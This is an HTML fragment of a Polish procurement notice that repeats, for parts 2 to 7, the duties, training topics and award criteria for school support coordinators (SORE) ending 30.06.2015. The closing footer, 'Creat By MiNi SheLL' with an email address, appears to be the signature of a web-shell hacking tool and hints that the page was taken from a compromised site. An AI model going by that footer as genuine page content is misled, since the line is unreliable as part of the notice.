n) Projekt edukacyjny w szkole
o) Współpraca szkoły ze środowiskiem lokalnym 
p) Rodzice są partnerami szkoły 
q) Nauczyciel 45+ 
r) Szkoła promuje wartość edukacji 
s) Doradztwo edukacyjno-zawodowe w szkole 
t) Efektywna organizacja pracy zespołów nauczycielskich 
u) Współpraca nauczycieli w prowadzeniu procesów edukacyjnych 
v) Jak efektywnie wykorzystać wyposażenie i warunki lokalowe szkoły? 
w) Jak i po co prowadzić ewaluacje wewnętrzną? 
x) Pierwszy/drugi rok pracy dyrektora szkoły..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Ilość godzin zajęć z nauczycielami, dyrektorami szkół, radami pedagogicznymi - 20</li>
<li>3. Ilość godzin doświadczenia w koordynacji pracami zespołów - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pełnienie funkcji SORE dla 4 szkół/przedszkoli.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Do zadań każdego z SORE będzie należało: 
1. Koordynacja procesów rozwojowych podopiecznych szkół/przedszkoli poprzez:
a) pomoc w przeprowadzeniu diagnozy potrzeb rozwojowych, 
b) opracowanie rocznych planów wsparcia każdej szkoły/przedszkola (jednego na rok szkolny), 
c) wybór i dostosowanie oferty doskonalenia do potrzeb każdej szkoły/przedszkola, d) pomoc w opracowaniu szczegółowego zakresu zadań i wymagań ekspertów do prowadzenia spotkań edukacyjnych uwzględnionych w planie wsparcia i ofercie doskonalenia, 
e) monitorowanie procesu doskonalenia, w tym: prowadzenie spotkań, konsultacji zbiorowych i indywidualnych z dyrektorami, nauczycielami, ekspertami, 
f) utrzymywanie stałego kontaktu z dyrektorami i nauczycielami, 
g) udział w konsultacjach indywidualnych dla nauczycieli, 
h) przygotowanie sprawozdania z rocznego planu wsparcia, 
i) ewaluację procesu wsparcia, według wskazań Zamawiającego. 
2. Prowadzenie dokumentacji dotyczącej realizowanej funkcji, w tym karty czasu pracy według wskazań Zamawiającego i dostarczanie prowadzonej dokumentacji w terminie wskazanym przez Zamawiającego. Wszelka dokumentacja sporządzona w ramach realizacji zamówienia powinna być prowadzona na drukach zawierających podane przez Zamawiającego logo i nazwę projektu. 
3. Współpraca z personelem projektu i uwzględnianie w działaniach wskazań Zamawiającego. W ramach realizacji projektu przewidywana jest następująca tematyka zagadnień: 
a) Jak pomóc uczniowi osiągnąć sukces edukacyjny? 
b) Ocenianie kształtujące 
c) Techniki uczenia się i metody motywujące do nauki 
d) Uczeń - aktywny uczestnik procesu uczenia się 
e) Wykorzystanie EWD w ewaluacji wewnętrznej szkoły 
f) Oferta edukacyjna drogą do właściwej realizacji podstawy programowej 
g) Wspieranie pracy wychowawców klas - bezpieczna szkoła 
h) Postawy uczniowskie. Jak je kształtować? 
i) Budowa koncepcji pracy szkoły 
j) Praca z uczniem młodszym 
k) Praca z uczniem zdolnym 
l) Praca z uczniem o specjalnych potrzebach edukacyjnych 
m) Wykorzystanie TIK na zajęciach edukacyjnych - bezpieczny Internet 
n) Projekt edukacyjny w szkole
o) Współpraca szkoły ze środowiskiem lokalnym 
p) Rodzice są partnerami szkoły 
q) Nauczyciel 45+ 
r) Szkoła promuje wartość edukacji 
s) Doradztwo edukacyjno-zawodowe w szkole 
t) Efektywna organizacja pracy zespołów nauczycielskich 
u) Współpraca nauczycieli w prowadzeniu procesów edukacyjnych 
v) Jak efektywnie wykorzystać wyposażenie i warunki lokalowe szkoły? 
w) Jak i po co prowadzić ewaluacje wewnętrzną? 
x) Pierwszy/drugi rok pracy dyrektora szkoły..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Ilość godzin zajęć z nauczycielami, dyrektorami szkół, radami pedagogicznymi - 20</li>
<li>3. Ilość godzin doświadczenia w koordynacji pracami zespołów - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pełnienie funkcji SORE dla 4 szkół/przedszkoli..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Do zadań każdego z SORE będzie należało: 
1. Koordynacja procesów rozwojowych podopiecznych szkół/przedszkoli poprzez:
a) pomoc w przeprowadzeniu diagnozy potrzeb rozwojowych, 
b) opracowanie rocznych planów wsparcia każdej szkoły/przedszkola (jednego na rok szkolny), 
c) wybór i dostosowanie oferty doskonalenia do potrzeb każdej szkoły/przedszkola, d) pomoc w opracowaniu szczegółowego zakresu zadań i wymagań ekspertów do prowadzenia spotkań edukacyjnych uwzględnionych w planie wsparcia i ofercie doskonalenia, 
e) monitorowanie procesu doskonalenia, w tym: prowadzenie spotkań, konsultacji zbiorowych i indywidualnych z dyrektorami, nauczycielami, ekspertami, 
f) utrzymywanie stałego kontaktu z dyrektorami i nauczycielami, 
g) udział w konsultacjach indywidualnych dla nauczycieli, 
h) przygotowanie sprawozdania z rocznego planu wsparcia, 
i) ewaluację procesu wsparcia, według wskazań Zamawiającego. 
2. Prowadzenie dokumentacji dotyczącej realizowanej funkcji, w tym karty czasu pracy według wskazań Zamawiającego i dostarczanie prowadzonej dokumentacji w terminie wskazanym przez Zamawiającego. Wszelka dokumentacja sporządzona w ramach realizacji zamówienia powinna być prowadzona na drukach zawierających podane przez Zamawiającego logo i nazwę projektu. 
3. Współpraca z personelem projektu i uwzględnianie w działaniach wskazań Zamawiającego. W ramach realizacji projektu przewidywana jest następująca tematyka zagadnień: 
a) Jak pomóc uczniowi osiągnąć sukces edukacyjny? 
b) Ocenianie kształtujące 
c) Techniki uczenia się i metody motywujące do nauki 
d) Uczeń - aktywny uczestnik procesu uczenia się 
e) Wykorzystanie EWD w ewaluacji wewnętrznej szkoły 
f) Oferta edukacyjna drogą do właściwej realizacji podstawy programowej 
g) Wspieranie pracy wychowawców klas - bezpieczna szkoła 
h) Postawy uczniowskie. Jak je kształtować? 
i) Budowa koncepcji pracy szkoły 
j) Praca z uczniem młodszym 
k) Praca z uczniem zdolnym 
l) Praca z uczniem o specjalnych potrzebach edukacyjnych 
m) Wykorzystanie TIK na zajęciach edukacyjnych - bezpieczny Internet 
n) Projekt edukacyjny w szkole
o) Współpraca szkoły ze środowiskiem lokalnym 
p) Rodzice są partnerami szkoły 
q) Nauczyciel 45+ 
r) Szkoła promuje wartość edukacji 
s) Doradztwo edukacyjno-zawodowe w szkole 
t) Efektywna organizacja pracy zespołów nauczycielskich 
u) Współpraca nauczycieli w prowadzeniu procesów edukacyjnych 
v) Jak efektywnie wykorzystać wyposażenie i warunki lokalowe szkoły? 
w) Jak i po co prowadzić ewaluacje wewnętrzną? 
x) Pierwszy/drugi rok pracy dyrektora szkoły..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Ilość godzin zajęć z nauczycielami, dyrektorami szkół, radami pedagogicznymi - 20</li>
<li>3. Ilość godzin doświadczenia w koordynacji pracami zespołów - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pełnienie funkcji SORE dla 4 szkół/przedszkoli..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Do zadań każdego z SORE będzie należało: 
1. Koordynacja procesów rozwojowych podopiecznych szkół/przedszkoli poprzez:
a) pomoc w przeprowadzeniu diagnozy potrzeb rozwojowych, 
b) opracowanie rocznych planów wsparcia każdej szkoły/przedszkola (jednego na rok szkolny), 
c) wybór i dostosowanie oferty doskonalenia do potrzeb każdej szkoły/przedszkola, d) pomoc w opracowaniu szczegółowego zakresu zadań i wymagań ekspertów do prowadzenia spotkań edukacyjnych uwzględnionych w planie wsparcia i ofercie doskonalenia, 
e) monitorowanie procesu doskonalenia, w tym: prowadzenie spotkań, konsultacji zbiorowych i indywidualnych z dyrektorami, nauczycielami, ekspertami, 
f) utrzymywanie stałego kontaktu z dyrektorami i nauczycielami, 
g) udział w konsultacjach indywidualnych dla nauczycieli, 
h) przygotowanie sprawozdania z rocznego planu wsparcia, 
i) ewaluację procesu wsparcia, według wskazań Zamawiającego. 
2. Prowadzenie dokumentacji dotyczącej realizowanej funkcji, w tym karty czasu pracy według wskazań Zamawiającego i dostarczanie prowadzonej dokumentacji w terminie wskazanym przez Zamawiającego. Wszelka dokumentacja sporządzona w ramach realizacji zamówienia powinna być prowadzona na drukach zawierających podane przez Zamawiającego logo i nazwę projektu. 
3. Współpraca z personelem projektu i uwzględnianie w działaniach wskazań Zamawiającego. W ramach realizacji projektu przewidywana jest następująca tematyka zagadnień: 
a) Jak pomóc uczniowi osiągnąć sukces edukacyjny? 
b) Ocenianie kształtujące 
c) Techniki uczenia się i metody motywujące do nauki 
d) Uczeń - aktywny uczestnik procesu uczenia się 
e) Wykorzystanie EWD w ewaluacji wewnętrznej szkoły 
f) Oferta edukacyjna drogą do właściwej realizacji podstawy programowej 
g) Wspieranie pracy wychowawców klas - bezpieczna szkoła 
h) Postawy uczniowskie. Jak je kształtować? 
i) Budowa koncepcji pracy szkoły 
j) Praca z uczniem młodszym 
k) Praca z uczniem zdolnym 
l) Praca z uczniem o specjalnych potrzebach edukacyjnych 
m) Wykorzystanie TIK na zajęciach edukacyjnych - bezpieczny Internet 
n) Projekt edukacyjny w szkole
o) Współpraca szkoły ze środowiskiem lokalnym 
p) Rodzice są partnerami szkoły 
q) Nauczyciel 45+ 
r) Szkoła promuje wartość edukacji 
s) Doradztwo edukacyjno-zawodowe w szkole 
t) Efektywna organizacja pracy zespołów nauczycielskich 
u) Współpraca nauczycieli w prowadzeniu procesów edukacyjnych 
v) Jak efektywnie wykorzystać wyposażenie i warunki lokalowe szkoły? 
w) Jak i po co prowadzić ewaluacje wewnętrzną? 
x) Pierwszy/drugi rok pracy dyrektora szkoły..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Ilość godzin zajęć z nauczycielami, dyrektorami szkół, radami pedagogicznymi - 20</li>
<li>3. Ilość godzin doświadczenia w koordynacji pracami zespołów - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pełnienie funkcji SORE dla 4 szkół/przedszkoli..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Do zadań każdego z SORE będzie należało: 
1. Koordynacja procesów rozwojowych podopiecznych szkół/przedszkoli poprzez:
a) pomoc w przeprowadzeniu diagnozy potrzeb rozwojowych, 
b) opracowanie rocznych planów wsparcia każdej szkoły/przedszkola (jednego na rok szkolny), 
c) wybór i dostosowanie oferty doskonalenia do potrzeb każdej szkoły/przedszkola, d) pomoc w opracowaniu szczegółowego zakresu zadań i wymagań ekspertów do prowadzenia spotkań edukacyjnych uwzględnionych w planie wsparcia i ofercie doskonalenia, 
e) monitorowanie procesu doskonalenia, w tym: prowadzenie spotkań, konsultacji zbiorowych i indywidualnych z dyrektorami, nauczycielami, ekspertami, 
f) utrzymywanie stałego kontaktu z dyrektorami i nauczycielami, 
g) udział w konsultacjach indywidualnych dla nauczycieli, 
h) przygotowanie sprawozdania z rocznego planu wsparcia, 
i) ewaluację procesu wsparcia, według wskazań Zamawiającego. 
2. Prowadzenie dokumentacji dotyczącej realizowanej funkcji, w tym karty czasu pracy według wskazań Zamawiającego i dostarczanie prowadzonej dokumentacji w terminie wskazanym przez Zamawiającego. Wszelka dokumentacja sporządzona w ramach realizacji zamówienia powinna być prowadzona na drukach zawierających podane przez Zamawiającego logo i nazwę projektu. 
3. Współpraca z personelem projektu i uwzględnianie w działaniach wskazań Zamawiającego. W ramach realizacji projektu przewidywana jest następująca tematyka zagadnień: 
a) Jak pomóc uczniowi osiągnąć sukces edukacyjny? 
b) Ocenianie kształtujące 
c) Techniki uczenia się i metody motywujące do nauki 
d) Uczeń - aktywny uczestnik procesu uczenia się 
e) Wykorzystanie EWD w ewaluacji wewnętrznej szkoły 
f) Oferta edukacyjna drogą do właściwej realizacji podstawy programowej 
g) Wspieranie pracy wychowawców klas - bezpieczna szkoła 
h) Postawy uczniowskie. Jak je kształtować? 
i) Budowa koncepcji pracy szkoły 
j) Praca z uczniem młodszym 
k) Praca z uczniem zdolnym 
l) Praca z uczniem o specjalnych potrzebach edukacyjnych 
m) Wykorzystanie TIK na zajęciach edukacyjnych - bezpieczny Internet 
n) Projekt edukacyjny w szkole
o) Współpraca szkoły ze środowiskiem lokalnym 
p) Rodzice są partnerami szkoły 
q) Nauczyciel 45+ 
r) Szkoła promuje wartość edukacji 
s) Doradztwo edukacyjno-zawodowe w szkole 
t) Efektywna organizacja pracy zespołów nauczycielskich 
u) Współpraca nauczycieli w prowadzeniu procesów edukacyjnych 
v) Jak efektywnie wykorzystać wyposażenie i warunki lokalowe szkoły? 
w) Jak i po co prowadzić ewaluacje wewnętrzną? 
x) Pierwszy/drugi rok pracy dyrektora szkoły..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Ilość godzin zajęć z nauczycielami, dyrektorami szkół, radami pedagogicznymi - 20</li>
<li>3. Ilość godzin doświadczenia w koordynacji pracami zespołów - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pełnienie funkcji SORE dla 4 szkół/przedszkoli..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Do zadań każdego z SORE będzie należało: 
1. Koordynacja procesów rozwojowych podopiecznych szkół/przedszkoli poprzez:
a) pomoc w przeprowadzeniu diagnozy potrzeb rozwojowych, 
b) opracowanie rocznych planów wsparcia każdej szkoły/przedszkola (jednego na rok szkolny), 
c) wybór i dostosowanie oferty doskonalenia do potrzeb każdej szkoły/przedszkola, d) pomoc w opracowaniu szczegółowego zakresu zadań i wymagań ekspertów do prowadzenia spotkań edukacyjnych uwzględnionych w planie wsparcia i ofercie doskonalenia, 
e) monitorowanie procesu doskonalenia, w tym: prowadzenie spotkań, konsultacji zbiorowych i indywidualnych z dyrektorami, nauczycielami, ekspertami, 
f) utrzymywanie stałego kontaktu z dyrektorami i nauczycielami, 
g) udział w konsultacjach indywidualnych dla nauczycieli, 
h) przygotowanie sprawozdania z rocznego planu wsparcia, 
i) ewaluację procesu wsparcia, według wskazań Zamawiającego. 
2. Prowadzenie dokumentacji dotyczącej realizowanej funkcji, w tym karty czasu pracy według wskazań Zamawiającego i dostarczanie prowadzonej dokumentacji w terminie wskazanym przez Zamawiającego. Wszelka dokumentacja sporządzona w ramach realizacji zamówienia powinna być prowadzona na drukach zawierających podane przez Zamawiającego logo i nazwę projektu. 
3. Współpraca z personelem projektu i uwzględnianie w działaniach wskazań Zamawiającego. W ramach realizacji projektu przewidywana jest następująca tematyka zagadnień: 
a) Jak pomóc uczniowi osiągnąć sukces edukacyjny? 
b) Ocenianie kształtujące 
c) Techniki uczenia się i metody motywujące do nauki 
d) Uczeń - aktywny uczestnik procesu uczenia się 
e) Wykorzystanie EWD w ewaluacji wewnętrznej szkoły 
f) Oferta edukacyjna drogą do właściwej realizacji podstawy programowej 
g) Wspieranie pracy wychowawców klas - bezpieczna szkoła 
h) Postawy uczniowskie. Jak je kształtować? 
i) Budowa koncepcji pracy szkoły 
j) Praca z uczniem młodszym 
k) Praca z uczniem zdolnym 
l) Praca z uczniem o specjalnych potrzebach edukacyjnych 
m) Wykorzystanie TIK na zajęciach edukacyjnych - bezpieczny Internet 
n) Projekt edukacyjny w szkole
o) Współpraca szkoły ze środowiskiem lokalnym 
p) Rodzice są partnerami szkoły 
q) Nauczyciel 45+ 
r) Szkoła promuje wartość edukacji 
s) Doradztwo edukacyjno-zawodowe w szkole 
t) Efektywna organizacja pracy zespołów nauczycielskich 
u) Współpraca nauczycieli w prowadzeniu procesów edukacyjnych 
v) Jak efektywnie wykorzystać wyposażenie i warunki lokalowe szkoły? 
w) Jak i po co prowadzić ewaluacje wewnętrzną? 
x) Pierwszy/drugi rok pracy dyrektora szkoły..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Ilość godzin zajęć z nauczycielami, dyrektorami szkół, radami pedagogicznymi - 20</li>
<li>3. Ilość godzin doświadczenia w koordynacji pracami zespołów - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pełnienie funkcji SORE dla 4 szkół/przedszkoli..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Do zadań każdego z SORE będzie należało: 
1. Koordynacja procesów rozwojowych podopiecznych szkół/przedszkoli poprzez:
a) pomoc w przeprowadzeniu diagnozy potrzeb rozwojowych, 
b) opracowanie rocznych planów wsparcia każdej szkoły/przedszkola (jednego na rok szkolny), 
c) wybór i dostosowanie oferty doskonalenia do potrzeb każdej szkoły/przedszkola, d) pomoc w opracowaniu szczegółowego zakresu zadań i wymagań ekspertów do prowadzenia spotkań edukacyjnych uwzględnionych w planie wsparcia i ofercie doskonalenia, 
e) monitorowanie procesu doskonalenia, w tym: prowadzenie spotkań, konsultacji zbiorowych i indywidualnych z dyrektorami, nauczycielami, ekspertami, 
f) utrzymywanie stałego kontaktu z dyrektorami i nauczycielami, 
g) udział w konsultacjach indywidualnych dla nauczycieli, 
h) przygotowanie sprawozdania z rocznego planu wsparcia, 
i) ewaluację procesu wsparcia, według wskazań Zamawiającego. 
2. Prowadzenie dokumentacji dotyczącej realizowanej funkcji, w tym karty czasu pracy według wskazań Zamawiającego i dostarczanie prowadzonej dokumentacji w terminie wskazanym przez Zamawiającego. Wszelka dokumentacja sporządzona w ramach realizacji zamówienia powinna być prowadzona na drukach zawierających podane przez Zamawiającego logo i nazwę projektu. 
3. Współpraca z personelem projektu i uwzględnianie w działaniach wskazań Zamawiającego. W ramach realizacji projektu przewidywana jest następująca tematyka zagadnień: 
a) Jak pomóc uczniowi osiągnąć sukces edukacyjny? 
b) Ocenianie kształtujące 
c) Techniki uczenia się i metody motywujące do nauki 
d) Uczeń - aktywny uczestnik procesu uczenia się 
e) Wykorzystanie EWD w ewaluacji wewnętrznej szkoły 
f) Oferta edukacyjna drogą do właściwej realizacji podstawy programowej 
g) Wspieranie pracy wychowawców klas - bezpieczna szkoła 
h) Postawy uczniowskie. Jak je kształtować? 
i) Budowa koncepcji pracy szkoły 
j) Praca z uczniem młodszym 
k) Praca z uczniem zdolnym 
l) Praca z uczniem o specjalnych potrzebach edukacyjnych 
m) Wykorzystanie TIK na zajęciach edukacyjnych - bezpieczny Internet 
n) Projekt edukacyjny w szkole
o) Współpraca szkoły ze środowiskiem lokalnym 
p) Rodzice są partnerami szkoły 
q) Nauczyciel 45+ 
r) Szkoła promuje wartość edukacji 
s) Doradztwo edukacyjno-zawodowe w szkole 
t) Efektywna organizacja pracy zespołów nauczycielskich 
u) Współpraca nauczycieli w prowadzeniu procesów edukacyjnych 
v) Jak efektywnie wykorzystać wyposażenie i warunki lokalowe szkoły? 
w) Jak i po co prowadzić ewaluacje wewnętrzną? 
x) Pierwszy/drugi rok pracy dyrektora szkoły..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Ilość godzin zajęć z nauczycielami, dyrektorami szkół, radami pedagogicznymi - 20</li>
<li>3. Ilość godzin doświadczenia w koordynacji pracami zespołów - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com